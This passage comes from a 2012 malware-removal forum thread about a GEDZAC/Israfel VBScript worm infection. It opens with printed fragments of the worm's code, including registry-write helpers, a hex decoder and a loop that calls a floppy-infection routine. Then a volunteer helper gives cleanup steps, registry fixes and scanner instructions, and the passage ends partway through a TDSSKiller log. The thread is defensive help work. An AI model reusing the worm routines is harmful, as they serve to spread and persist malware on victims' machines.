If (Obj Is Nothing) Then ValidObject = False Else ValidObject = True
End Function
'----------------------------------------------------------------------------
Function FileEx(Path)
On Error Resume Next
If fso.FileExists(Path) Then FileEx = True Else FileEx = False
End Function
'----------------------------------------------------------------------------
Function FolderEx(Path)
On Error Resume Next
If fso.FolderExists(Path) Then FolderEx = True Else FolderEx = False
End Function
'----------------------------------------------------------------------------
Function Dcd(HT)
On Error Resume Next
For i = 1 To Len(HT) Step 2
tb = Chr(37+1) & Chr(72) & Mid(HT, i, 2): tt = tt & Chr(tb)
Next: Dcd = tt
End Function
'----------------------------------------------------------------------------
Sub ISleep()
On Error Resume Next: t=0
Do
WScript.Sleep 10000: t=t+1
Call Regenera
Call iRed
If t=60 Then t=0: Call InfectFloppy
Loop
End Sub
'----------------------------------------------------------------------------
Function Nms(Path)
On Error Resume Next
Nms=fso.GetFile(Path).ShortPath
End Function
'----------------------------------------------------------------------------
Sub Rgw(RgPath,RgValue,RgMod)
On Error Resume Next
If RgMod= Then wsl.RegWrite RgPath,RgValue Else wsl.RegWrite RgPath,RgValue,REG_DWORD
End Sub
'----------------------------------------------------------------------------
Function Rgr(RgPath)
On Error Resume Next
Rgr = wsl.RegRead (RgPath)
End Function
'----------------------------------------------------------------------------
Function Gsp(n)
On Error Resume Next
Select Case n
Case 0: Gsp = fso.GetSpecialFolder(n)
Case 1: Gsp = fso.GetSpecialFolder(n)
Case 2: Gsp = fso.GetSpecialFolder(n)
Case 3: Gsp = WScript.ScriptFullName
End Select
End Function
'----------------------------------------------------------------------------
Sub SA(path,n)
On Error Resume Next
fso.GetFile(path).attributes = n
End Sub
'----------------------------------------------------------------------------

#4 worries

worries
  • Topic Starter
  • Members
  • 47 posts

Posted 12 May 2012 - 01:24 PM

Actually, I am having trouble pasting as well. There are character strings in the log file that are too long, and I am guessing the forum won't let me post because of that.

What should I do? Can I upload the full file somewhere so you can download it from there? It is about 278 KB.

#5 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler

  • Malware Response Team
  • 8,307 posts
  • Gender:Male
  • Location:Bulgaria

Posted 12 May 2012 - 03:19 PM

Hello,



Please bear with me. The log looks strange. ComboFix seemed to run partially.
Is there a log called Bug.txt created on the C:\ drive?
If so please zip both (Combofix.txt and Bug.txt) and upload them here
Thanks!



Regards,
Georgi



#6 worries

worries
  • Topic Starter
  • Members
  • 47 posts

Posted 12 May 2012 - 05:06 PM

No bug.txt in C:.
I know combofix ran for a long time, and it did multiple boots.

After it finished running, my internet started working. But it has stopped working again.

I submitted the file where you asked.



#7 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler

  • Malware Response Team
  • 8,307 posts
  • Gender:Male
  • Location:Bulgaria

Posted 12 May 2012 - 05:17 PM

Hi,



We need to disable Spybot S&D's "TeaTimer"



TeaTimer works by preventing ANY changes to the system. It will attempt to undo any fixes we run, because it blocks these fixes from running.

In order to safeguard your system from problems that can be brought on by a half-finished fix, we need to disable TeaTimer. We can re-enable it when we're done if you like.
  • Open SpyBot Search and Destroy by going to Start -> All Programs -> Spybot Search and Destroy -> Spybot Search and Destroy.
  • If prompted with a legal dialog, accept the warning.
  • Click on mode and then on "Advanced Mode"
  • You may be presented with a warning dialog. If so, press Posted Image
  • Click on Posted Image
  • Click on Posted Image
  • Uncheck this checkbox:
    Posted Image
  • Close/Exit Spybot Search and Destroy




Run HijackThis.



  • Click on Do a system scan only.
  • Place a checkmark next to these lines (if still present).

    F1 - win.ini: run=C:\WINDOWS\system32\mouse_configurator.win
    O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
    O4 - HKLM\..\Run: [Israfel] C:\WINDOWS\system32\Israfel.vbs
    O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1

  • Then close all windows except HijackThis and click Fix Checked.





We need to execute a CFScript to clean some remnants.



Please do this:


1. Open Notepad, go to Format and make sure that Word Wrap is unchecked. <--- important!

2. Copy/paste the text in the codebox below into it (include the link as well):

http://www.bleepingcomputer.com/forums/topic453394.html

Collect::
c:\windows\system32\hta.vbs
c:\windows\system32\Israfel.vbs
c:\windows\system32\GEDZAC.vbs
c:\windows\system32\File.vbs
C:\Windows\system32\mouse_configurator.win
Registry::
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"=dword:00000001
"DisableNotifications"=dword:00000000

Save this as CFScript.txt, in the same location as ComboFix.exe

3. Close any open browsers.

4. Referring to the picture below, drag CFScript into ComboFix.exe

Posted Image

5. When Combofix finishes running, the ComboFix log will open along with a message box. With the above script, ComboFix captured some files to submit for analysis.
  • Important: Ensure you are connected to the internet before clicking OK on the message box.
  • A blue screen will appear, auto-uploading the zipped file I requested.
  • After the uploading is done you should see a message near the bottom saying "Upload was Successful".

**NOTE**
  • If for some reason ComboFix fails to upload anything, you will see this message:
    Posted Image
  • Please double-click this file: C:\CF-Submit.htm and follow the instructions there to upload that zipped file.


6. When ComboFix finishes, it will produce a log for you at C:\ComboFix.txt which I will require in your next reply.



Regards,
Georgi



#8 worries

worries
  • Topic Starter
  • Members
  • 47 posts

Posted 12 May 2012 - 06:51 PM

Georgi, I submitted the combofix.txt to the same location where you previously asked me to upload.

#9 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler

  • Malware Response Team
  • 8,307 posts
  • Gender:Male
  • Location:Bulgaria

Posted 13 May 2012 - 03:48 AM

Hello,



STEP 1



Please download UnhookExec.inf to your desktop (right-click and choose "Save target as" for Internet Explorer or "Save link as" for Mozilla Firefox).
Locate UnHookExec.inf on your desktop, right-click it and choose 'Install'.



STEP 2


  • Go to Start -> Run...
  • Enter notepad in the Run dialog box.
  • Press Posted Image.
  • Highlight the contents of the following codebox, and copy and paste that text into notepad.
    Windows Registry Editor Version 5.00
    
    [-HKEY_CLASSES_ROOT\keyfile]
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings]
    "Timeout"=-
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings]
    "Enabled"=dword:00000000
    
    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Scripting Host\Settings]
    "Timeout"=-
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings]
    "Enabled"=dword:00000000
    
  • Select File -> Save.
  • Press the Desktop button on the left side of the save dialog.
  • In the Posted Image box, type in Fix.reg.
  • Press Posted Image.
  • Close Notepad.
  • Double click Posted Image on your desktop.
  • Press Yes, and then Ok, when prompted.
  • Right click on Posted Image and choose Delete.
  • Press Yes.



STEP 3



Please download SystemLook from one of the links below and save it to your Desktop.
Download Mirror #1
Download Mirror #2

  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    :regfind
    GEDZAC
    
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt



STEP 4



I'd like us to scan your machine with ESET OnlineScan


  • Hold down Control and click on the following link to open ESET OnlineScan in a new window.
    ESET OnlineScan
  • Click the Run ESET Online Scanner button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on Posted Image to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the Posted Image icon on your desktop.
  • Check Posted Image
  • Click the Posted Image button.
  • Accept any security warnings from your browser.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Push the Start button.
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, push Posted Image
  • Push Posted Image, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Push the Posted Image button.
  • Push Posted Image



Regards,
Georgi



#10 worries

worries
  • Topic Starter
  • Members
  • 47 posts

Posted 13 May 2012 - 10:25 AM

I can't run the online scan. After downloading it, it runs the initial step and then keeps getting forced shut. I tried using a different browser to google ESET online scan, but all browsers (Firefox, Chrome, and IE) close down when I google that.




#11 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler

  • Malware Response Team
  • 8,307 posts
  • Gender:Male
  • Location:Bulgaria

Posted 13 May 2012 - 10:43 AM

Hi,



Please carefully follow my next set of steps:



STEP 1


  • Go to Start -> Run...
  • Enter notepad in the Run dialog box.
  • Press Posted Image.
  • Highlight the contents of the following codebox, and copy and paste that text into notepad.
    Windows Registry Editor Version 5.00
    
    [-HKEY_LOCAL_MACHINE\SOFTWARE\GEDZAC LABS]
    
  • Select File -> Save.
  • Press the Desktop button on the left side of the save dialog.
  • In the Posted Image box, type in Fix.reg.
  • Press Posted Image.
  • Close Notepad.
  • Double click Posted Image on your desktop.
  • Press Yes, and then Ok, when prompted.
  • Right click on Posted Image and choose Delete.
  • Press Yes.


STEP 2



Please download the latest version of TDSSKiller from here and save it to your Desktop.

  • Double-click on TDSSKiller.exe to run the application, then click on Change parameters.
  • Check the boxes beside Verify Driver Digital Signature and Detect TDLFS file system, then click OK.
  • Click the Start Scan button.
  • If a suspicious object is detected, the default action will be Skip, click on Continue.
  • If malicious objects are found, they will show in the Scan results - Select action for found objects and offer three options.
    Ensure Cure (default) is selected, then click Continue > Reboot now to finish the cleaning process.

    Note: If Cure is not available, please choose Skip instead, do not choose Delete unless instructed.
  • A report will be created in your root directory, (usually C:\ folder) in the form of "TDSSKiller.[Version]_[Date]_[Time]_log.txt". Please copy and paste the contents of that file here.


STEP 3



Please download aswMBR.exe to your desktop.

  • Double click the aswMBR.exe icon to run it.
  • The program will offer to download the latest antivirus definitions from Avast servers. Click YES to agree.
  • When it is done, in the AV Scan drop-down options choose C:\
  • Click the Scan button to start the scan
  • On completion of the scan, click the save log button, save it to your desktop and post it in your next reply.
Note - do NOT attempt any Fix or FixMBR yet.



STEP 4


  • Please download OTL from the link below:
  • Save it to your desktop.
  • Double click on the Posted Image icon on your desktop.
  • OTL should now start. Change the following settings:
    - Click on the Scan All Users checkbox at the top.
    - Under File Scans, change File age to 90
    - Check the boxes beside LOP Check and Purity Check
  • Copy and Paste the following code into the Posted Image textbox.
    netsvcs
    msconfig
    safebootminimal
    safebootnetwork
    "%WinDir%\$NtUninstallKB*$." /30
    C:\Program Files\Common Files\ComObjects\*.* /s
    %SYSTEMDRIVE%\*.*
    %USERPROFILE%\*.*
    %USERPROFILE%\Application Data\*.*
    %USERPROFILE%\Local Settings\Application Data\*.*
    %AllUsersProfile%\*.*
    %AllUsersProfile%\Application Data\*.*
    %USERPROFILE%\My Documents\*.*
    %CommonProgramFiles%\*.*
    %PROGRAMFILES%\*.*
    %systemroot%\system32\config\systemprofile\*.*
    %windir%\ServiceProfiles\LocalService\AppData\Local\Temp\*.*
    %windir%\ServiceProfiles\NetworkService\AppData\Local\Temp\*.*
    %windir%\temp*.*
    %windir%\system32\*.
    %systemroot%\system32\*.dll /lockedfiles
    %systemroot%\Tasks\*.job /lockedfiles
    %systemroot%\system32\drivers\*.sys /90
    %systemroot%\system32\drivers\*.sys /lockedfiles
    %systemroot%\system32\Spool\prtprocs\w32x86\*.dll
    %systemroot%\*. /rp /s
    %systemroot%\assembly\tmp\*.* /S /MD5
    %systemroot%\assembly\temp\*.* /S /MD5
    %systemroot%\assembly\GAC_32\*.* /S /MD5
    %systemroot%\assembly\GAC_MSIL\*.* /S /MD5
    /md5start
    smss.exe
    winlogon.exe
    services.exe
    lsass.exe
    svchost.exe
    explorer.exe
    netbt.sys
    ipsec.sys
    hlp.dat
    /md5stop
    
  • Push the Posted Image button.
  • Two reports will open, copy and paste them in a reply here:
    • OTL.txt <-- Will be opened
    • Extra.txt <-- Will be minimized



Regards,
Georgi



#12 worries

worries
  • Topic Starter
  • Members
  • 47 posts

Posted 13 May 2012 - 01:20 PM

TDSS:
11:48:02.0203 0464 TDSS rootkit removing tool 2.7.34.0 May 2 2012 09:59:18
11:48:02.0484 0464 ============================================================
11:48:02.0484 0464 Current date / time: 2012/05/13 11:48:02.0484
11:48:02.0484 0464 SystemInfo:
11:48:02.0484 0464
11:48:02.0484 0464 OS Version: 5.1.2600 ServicePack: 3.0
11:48:02.0484 0464 Product type: Workstation
11:48:02.0484 0464 ComputerName: FELIX
11:48:02.0484 0464 UserName: Annie
11:48:02.0484 0464 Windows directory: C:\WINDOWS
11:48:02.0484 0464 System windows directory: C:\WINDOWS
11:48:02.0484 0464 Processor architecture: Intel x86
11:48:02.0484 0464 Number of processors: 2
11:48:02.0484 0464 Page size: 0x1000
11:48:02.0484 0464 Boot type: Normal boot
11:48:02.0484 0464 ============================================================
11:48:03.0390 0464 Drive \Device\Harddisk0\DR0 - Size: 0x25433D6000 (149.05 Gb), SectorSize: 0x200, Cylinders: 0x4C01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
11:48:03.0390 0464 ============================================================
11:48:03.0390 0464 \Device\Harddisk0\DR0:
11:48:03.0390 0464 MBR partitions:
11:48:03.0390 0464 \Device\Harddisk0\DR0\Partition0: MBR, Type 0x7, StartLBA 0x1402800, BlocksNum 0x11616800
11:48:03.0390 0464 ============================================================
11:48:03.0437 0464 C: <-> \Device\Harddisk0\DR0\Partition0
11:48:03.0437 0464 ============================================================
11:48:03.0437 0464 Initialize success
11:48:03.0437 0464 ============================================================
11:48:54.0484 1896 ============================================================
11:48:54.0484 1896 Scan started
11:48:54.0484 1896 Mode: Manual; SigCheck; TDLFS;
11:48:54.0484 1896 ============================================================
11:48:54.0828 1896 Abiosdsk - ok
11:48:54.0859 1896 abp480n5 (6abb91494fe6c59089b9336452ab2ea3) C:\WINDOWS\system32\DRIVERS\ABP480N5.SYS
11:48:55.0343 1896 abp480n5 - ok
11:48:55.0406 1896 ACPI (8fd99680a539792a30e97944fdaecf17) C:\WINDOWS\system32\DRIVERS\ACPI.sys
11:48:55.0703 1896 ACPI - ok
11:48:55.0718 1896 ACPIEC (9859c0f6936e723e4892d7141b1327d5) C:\WINDOWS\system32\DRIVERS\ACPIEC.sys
11:48:56.0140 1896 ACPIEC - ok
11:48:56.0359 1896 adpu160m (9a11864873da202c996558b2106b0bbc) C:\WINDOWS\system32\DRIVERS\adpu160m.sys
11:48:56.0625 1896 adpu160m - ok
11:48:56.0828 1896 aec (8bed39e3c35d6a489438b8141717a557) C:\WINDOWS\system32\drivers\aec.sys
11:48:57.0109 1896 aec - ok
11:48:57.0140 1896 AFD (322d0e36693d6e24a2398bee62a268cd) C:\WINDOWS\System32\drivers\afd.sys
11:48:57.0437 1896 AFD - ok
11:48:57.0593 1896 agp440 (08fd04aa961bdc77fb983f328334e3d7) C:\WINDOWS\system32\DRIVERS\agp440.sys
11:48:57.0859 1896 agp440 - ok
11:48:58.0031 1896 agpCPQ (03a7e0922acfe1b07d5db2eeb0773063) C:\WINDOWS\system32\DRIVERS\agpCPQ.sys
11:48:58.0312 1896 agpCPQ - ok
11:48:58.0484 1896 Aha154x (c23ea9b5f46c7f7910db3eab648ff013) C:\WINDOWS\system32\DRIVERS\aha154x.sys
11:48:58.0578 1896 Aha154x - ok
11:48:58.0609 1896 aic78u2 (19dd0fb48b0c18892f70e2e7d61a1529) C:\WINDOWS\system32\DRIVERS\aic78u2.sys
11:48:58.0890 1896 aic78u2 - ok
11:48:58.0906 1896 aic78xx (b7fe594a7468aa0132deb03fb8e34326) C:\WINDOWS\system32\DRIVERS\aic78xx.sys
11:48:59.0187 1896 aic78xx - ok
11:48:59.0375 1896 Alerter (a9a3daa780ca6c9671a19d52456705b4) C:\WINDOWS\system32\alrsvc.dll
11:48:59.0640 1896 Alerter - ok
11:48:59.0828 1896 ALG (8c515081584a38aa007909cd02020b3d) C:\WINDOWS\System32\alg.exe
11:48:59.0921 1896 ALG - ok
11:48:59.0937 1896 AliIde (1140ab9938809700b46bb88e46d72a96) C:\WINDOWS\system32\DRIVERS\aliide.sys
11:49:00.0218 1896 AliIde - ok
11:49:00.0390 1896 alim1541 (cb08aed0de2dd889a8a820cd8082d83c) C:\WINDOWS\system32\DRIVERS\alim1541.sys
11:49:00.0671 1896 alim1541 - ok
11:49:00.0953 1896 Ambfilt (f6af59d6eee5e1c304f7f73706ad11d8) C:\WINDOWS\system32\drivers\Ambfilt.sys
11:49:01.0187 1896 Ambfilt - ok
11:49:01.0359 1896 amdagp (95b4fb835e28aa1336ceeb07fd5b9398) C:\WINDOWS\system32\DRIVERS\amdagp.sys
11:49:01.0640 1896 amdagp - ok
11:49:01.0812 1896 amsint (79f5add8d24bd6893f2903a3e2f3fad6) C:\WINDOWS\system32\DRIVERS\amsint.sys
11:49:01.0906 1896 amsint - ok
11:49:01.0921 1896 AppMgmt - ok
11:49:01.0953 1896 asc (62d318e9a0c8fc9b780008e724283707) C:\WINDOWS\system32\DRIVERS\asc.sys
11:49:02.0234 1896 asc - ok
11:49:02.0406 1896 asc3350p (69eb0cc7714b32896ccbfd5edcbea447) C:\WINDOWS\system32\DRIVERS\asc3350p.sys
11:49:02.0500 1896 asc3350p - ok
11:49:02.0531 1896 asc3550 (5d8de112aa0254b907861e9e9c31d597) C:\WINDOWS\system32\DRIVERS\asc3550.sys
11:49:02.0781 1896 asc3550 - ok
11:49:03.0062 1896 aspnet_state (0e5e4957549056e2bf2c49f4f6b601ad) C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
11:49:03.0078 1896 aspnet_state - ok
11:49:03.0140 1896 AsyncMac (b153affac761e7f5fcfa822b9c4e97bc) C:\WINDOWS\system32\DRIVERS\asyncmac.sys
11:49:03.0437 1896 AsyncMac - ok
11:49:03.0625 1896 atapi (9f3a2f5aa6875c72bf062c712cfa2674) C:\WINDOWS\system32\DRIVERS\atapi.sys
11:49:03.0921 1896 atapi - ok
11:49:03.0937 1896 Atdisk - ok
11:49:03.0953 1896 Atmarpc (9916c1225104ba14794209cfa8012159) C:\WINDOWS\system32\DRIVERS\atmarpc.sys
11:49:04.0234 1896 Atmarpc - ok
11:49:04.0421 1896 AudioSrv (def7a7882bec100fe0b2ce2549188f9d) C:\WINDOWS\System32\audiosrv.dll
11:49:04.0734 1896 AudioSrv - ok
11:49:04.0921 1896 audstub (d9f724aa26c010a217c97606b160ed68) C:\WINDOWS\system32\DRIVERS\audstub.sys
11:49:05.0203 1896 audstub - ok
11:49:05.0515 1896 BCM43XX (fe4ed785396eaa554c561992106a35fa) C:\WINDOWS\system32\DRIVERS\bcmwl5.sys
11:49:05.0718 1896 BCM43XX - ok
11:49:05.0859 1896 Beep (da1f27d85e0d1525f6621372e7b685e9) C:\WINDOWS\system32\drivers\Beep.sys
11:49:06.0140 1896 Beep - ok
11:49:06.0375 1896 BITS (574738f61fca2935f5265dc4e5691314) C:\WINDOWS\system32\qmgr.dll
11:49:06.0718 1896 BITS - ok
11:49:06.0921 1896 Browser (a06ce3399d16db864f55faeb1f1927a9) C:\WINDOWS\System32\browser.dll
11:49:07.0203 1896 Browser - ok
11:49:07.0203 1896 catchme - ok
11:49:07.0390 1896 cbidf (90a673fc8e12a79afbed2576f6a7aaf9) C:\WINDOWS\system32\DRIVERS\cbidf2k.sys
11:49:07.0656 1896 cbidf - ok
11:49:07.0671 1896 cbidf2k (90a673fc8e12a79afbed2576f6a7aaf9) C:\WINDOWS\system32\drivers\cbidf2k.sys
11:49:07.0937 1896 cbidf2k - ok
11:49:07.0968 1896 CCDECODE (0be5aef125be881c4f854c554f2b025c) C:\WINDOWS\system32\DRIVERS\CCDECODE.sys
11:49:08.0234 1896 CCDECODE - ok
11:49:08.0421 1896 cd20xrnt (f3ec03299634490e97bbce94cd2954c7) C:\WINDOWS\system32\DRIVERS\cd20xrnt.sys
11:49:08.0531 1896 cd20xrnt - ok
11:49:08.0546 1896 Cdaudio (c1b486a7658353d33a10cc15211a873b) C:\WINDOWS\system32\drivers\Cdaudio.sys
11:49:08.0812 1896 Cdaudio - ok
11:49:09.0000 1896 Cdfs (c885b02847f5d2fd45a24e219ed93b32) C:\WINDOWS\system32\drivers\Cdfs.sys
11:49:09.0296 1896 Cdfs - ok
11:49:09.0500 1896 Cdrom (4b0a100eaf5c49ef3cca8c641431eacc) C:\WINDOWS\system32\DRIVERS\cdrom.sys
11:49:09.0546 1896 Cdrom - ok
11:49:09.0546 1896 Changer - ok
11:49:09.0593 1896 CiSvc (1cfe720eb8d93a7158a4ebc3ab178bde) C:\WINDOWS\system32\cisvc.exe
11:49:09.0890 1896 CiSvc - ok
11:49:09.0921 1896 ClipSrv (34cbe729f38138217f9c80212a2a0c82) C:\WINDOWS\system32\clipsrv.exe
11:49:10.0218 1896 ClipSrv - ok
11:49:10.0468 1896 clr_optimization_v2.0.50727_32 (d87acaed61e417bba546ced5e7e36d9c) C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
11:49:10.0500 1896 clr_optimization_v2.0.50727_32 - ok
11:49:10.0531 1896 CmBatt (0f6c187d38d98f8df904589a5f94d411) C:\WINDOWS\system32\DRIVERS\CmBatt.sys
11:49:10.0828 1896 CmBatt - ok
11:49:11.0015 1896 CmdIde (e5dcb56c533014ecbc556a8357c929d5) C:\WINDOWS\system32\DRIVERS\cmdide.sys
11:49:11.0281 1896 CmdIde - ok
11:49:11.0484 1896 Compbatt (6e4c9f21f0fae8940661144f41b13203) C:\WINDOWS\system32\DRIVERS\compbatt.sys
11:49:11.0750 1896 Compbatt - ok
11:49:11.0765 1896 COMSysApp - ok
11:49:11.0921 1896 Cpqarray (3ee529119eed34cd212a215e8c40d4b6) C:\WINDOWS\system32\DRIVERS\cpqarray.sys
11:49:12.0187 1896 Cpqarray - ok
11:49:12.0375 1896 CryptSvc (3d4e199942e29207970e04315d02ad3b) C:\WINDOWS\System32\cryptsvc.dll
11:49:12.0656 1896 CryptSvc - ok
11:49:12.0843 1896 dac2w2k (e550e7418984b65a78299d248f0a7f36) C:\WINDOWS\system32\DRIVERS\dac2w2k.sys
11:49:13.0140 1896 dac2w2k - ok
11:49:13.0156 1896 dac960nt (683789caa3864eb46125ae86ff677d34) C:\WINDOWS\system32\DRIVERS\dac960nt.sys
11:49:13.0437 1896 dac960nt - ok
11:49:13.0656 1896 DcomLaunch (6b27a5c03dfb94b4245739065431322c) C:\WINDOWS\system32\rpcss.dll
11:49:13.0734 1896 DcomLaunch - ok
11:49:13.0781 1896 Dhcp (5e38d7684a49cacfb752b046357e0589) C:\WINDOWS\System32\dhcpcsvc.dll
11:49:14.0078 1896 Dhcp - ok
11:49:14.0109 1896 Disk (044452051f3e02e7963599fc8f4f3e25) C:\WINDOWS\system32\DRIVERS\disk.sys
11:49:14.0421 1896 Disk - ok
11:49:14.0453 1896 DKbFltr (060db81dfb79c8244eb65d10b6c7873f) C:\WINDOWS\system32\DRIVERS\DKbFltr.sys
11:49:14.0484 1896 DKbFltr - ok
11:49:14.0500 1896 dmadmin - ok
11:49:14.0578 1896 dmboot (d992fe1274bde0f84ad826acae022a41) C:\WINDOWS\system32\drivers\dmboot.sys
11:49:14.0906 1896 dmboot - ok
11:49:14.0953 1896 dmio (7c824cf7bbde77d95c08005717a95f6f) C:\WINDOWS\system32\drivers\dmio.sys
11:49:15.0234 1896 dmio - ok
11:49:15.0406 1896 dmload (e9317282a63ca4d188c0df5e09c6ac5f) C:\WINDOWS\system32\drivers\dmload.sys
11:49:15.0656 1896 dmload - ok
11:49:15.0859 1896 dmserver (57edec2e5f59f0335e92f35184bc8631) C:\WINDOWS\System32\dmserver.dll
11:49:16.0140 1896 dmserver - ok
11:49:16.0343 1896 DMusic (8a208dfcf89792a484e76c40e5f50b45) C:\WINDOWS\system32\drivers\DMusic.sys
11:49:16.0609 1896 DMusic - ok
11:49:16.0781 1896 Dnscache (474b4dc3983173e4b4c9740b0dac98a6) C:\WINDOWS\System32\dnsrslvr.dll
11:49:17.0046 1896 Dnscache - ok
11:49:17.0093 1896 Dot3svc (0f0f6e687e5e15579ef4da8dd6945814) C:\WINDOWS\System32\dot3svc.dll
11:49:17.0359 1896 Dot3svc - ok
11:49:17.0531 1896 dpti2o (40f3b93b4e5b0126f2f5c0a7a5e22660) C:\WINDOWS\system32\DRIVERS\dpti2o.sys
11:49:17.0796 1896 dpti2o - ok
11:49:18.0046 1896 DritekPortIO (5c918d413f5837e67a85775c9873775e) C:\PROGRA~1\LAUNCH~1\DPortIO.sys
11:49:18.0125 1896 DritekPortIO - ok
11:49:18.0171 1896 drmkaud (8f5fcff8e8848afac920905fbd9d33c8) C:\WINDOWS\system32\drivers\drmkaud.sys
11:49:18.0453 1896 drmkaud - ok
11:49:18.0640 1896 dtsoftbus01 (687af6bb383885ff6a64071b189a7f3e) C:\WINDOWS\system32\DRIVERS\dtsoftbus01.sys
11:49:18.0671 1896 dtsoftbus01 - ok
11:49:18.0718 1896 EapHost (2187855a7703adef0cef9ee4285182cc) C:\WINDOWS\System32\eapsvc.dll
11:49:18.0984 1896 EapHost - ok
11:49:19.0015 1896 ERSvc (bc93b4a066477954555966d77fec9ecb) C:\WINDOWS\System32\ersvc.dll
11:49:19.0296 1896 ERSvc - ok
11:49:19.0484 1896 Eventlog (65df52f5b8b6e9bbd183505225c37315) C:\WINDOWS\system32\services.exe
11:49:19.0531 1896 Eventlog - ok
11:49:19.0578 1896 EventSystem (d4991d98f2db73c60d042f1aef79efae) C:\WINDOWS\system32\es.dll
11:49:19.0656 1896 EventSystem - ok
11:49:19.0703 1896 Fastfat (38d332a6d56af32635675f132548343e) C:\WINDOWS\system32\drivers\Fastfat.sys
11:49:19.0984 1896 Fastfat - ok
11:49:20.0031 1896 FastUserSwitchingCompatibility (1926899bf9ffe2602b63074971700412) C:\WINDOWS\System32\shsvcs.dll
11:49:20.0296 1896 FastUserSwitchingCompatibility - ok
11:49:20.0500 1896 Fax (e97d6a8684466df94ff3bc24fb787a07) C:\WINDOWS\system32\fxssvc.exe
11:49:20.0796 1896 Fax - ok
11:49:21.0015 1896 Fdc (92cdd60b6730b9f50f6a1a0c1f8cdc81) C:\WINDOWS\system32\drivers\Fdc.sys
11:49:21.0281 1896 Fdc - ok
11:49:21.0484 1896 Fips (d45926117eb9fa946a6af572fbe1caa3) C:\WINDOWS\system32\drivers\Fips.sys
11:49:21.0781 1896 Fips - ok
11:49:21.0781 1896 Flpydisk (9d27e7b80bfcdf1cdd9b555862d5e7f0) C:\WINDOWS\system32\drivers\Flpydisk.sys
11:49:22.0203 1896 Flpydisk - ok
11:49:22.0406 1896 FltMgr (b2cf4b0786f8212cb92ed2b50c6db6b0) C:\WINDOWS\system32\DRIVERS\fltMgr.sys
11:49:22.0687 1896 FltMgr - ok
11:49:23.0015 1896 FontCache3.0.0.0 (8ba7c024070f2b7fdd98ed8a4ba41789) C:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
11:49:23.0031 1896 FontCache3.0.0.0 - ok
11:49:23.0093 1896 Fs_Rec (3e1e2bd4f39b0e2b7dc4f4d2bcc2779a) C:\WINDOWS\system32\drivers\Fs_Rec.sys
11:49:23.0359 1896 Fs_Rec - ok
11:49:23.0546 1896 Ftdisk (6ac26732762483366c3969c9e4d2259d) C:\WINDOWS\system32\DRIVERS\ftdisk.sys
11:49:23.0812 1896 Ftdisk - ok
11:49:24.0000 1896 Gpc (0a02c63c8b144bd8c86b103dee7c86a2) C:\WINDOWS\system32\DRIVERS\msgpc.sys
11:49:24.0312 1896 Gpc - ok
11:49:24.0500 1896 HDAudBus (573c7d0a32852b48f3058cfd8026f511) C:\WINDOWS\system32\DRIVERS\HDAudBus.sys
11:49:24.0781 1896 HDAudBus - ok
11:49:25.0031 1896 helpsvc (4fcca060dfe0c51a09dd5c3843888bcd) C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll
11:49:25.0312 1896 helpsvc - ok
11:49:25.0328 1896 HidServ - ok
11:49:25.0515 1896 hkmsvc (8878bd685e490239777bfe51320b88e9) C:\WINDOWS\System32\kmsvc.dll
11:49:25.0796 1896 hkmsvc - ok
11:49:26.0000 1896 hpn (b028377dea0546a5fcfba928a8aefae0) C:\WINDOWS\system32\DRIVERS\hpn.sys
11:49:26.0265 1896 hpn - ok
11:49:26.0453 1896 HTTP (f6aacf5bce2893e0c1754afeb672e5c9) C:\WINDOWS\system32\Drivers\HTTP.sys
11:49:26.0750 1896 HTTP - ok
11:49:26.0953 1896 HTTPFilter (6100a808600f44d999cebdef8841c7a3) C:\WINDOWS\System32\w3ssl.dll
11:49:27.0250 1896 HTTPFilter - ok
11:49:27.0453 1896 hwdatacard (20330198554b7ddb44403af21d6ae179) C:\WINDOWS\system32\DRIVERS\ewusbmdm.sys
11:49:27.0515 1896 hwdatacard - ok
11:49:27.0546 1896 hwusbdev (922065957563d851b5a68b95aadac6ad) C:\WINDOWS\system32\DRIVERS\ewusbdev.sys
11:49:27.0593 1896 hwusbdev - ok
11:49:27.0640 1896 i2omgmt (9368670bd426ebea5e8b18a62416ec28) C:\WINDOWS\system32\drivers\i2omgmt.sys
11:49:27.0906 1896 i2omgmt - ok
11:49:27.0921 1896 i2omp (f10863bf1ccc290babd1a09188ae49e0) C:\WINDOWS\system32\DRIVERS\i2omp.sys
11:49:28.0203 1896 i2omp - ok
11:49:28.0234 1896 i8042prt (4a0b06aa8943c1e332520f7440c0aa30) C:\WINDOWS\system32\DRIVERS\i8042prt.sys
11:49:28.0484 1896 i8042prt - ok
11:49:28.0593 1896 IAANTMON (cb686f44bf955ea02520710a56874fa4) C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTMon.exe
11:49:28.0656 1896 IAANTMON - ok
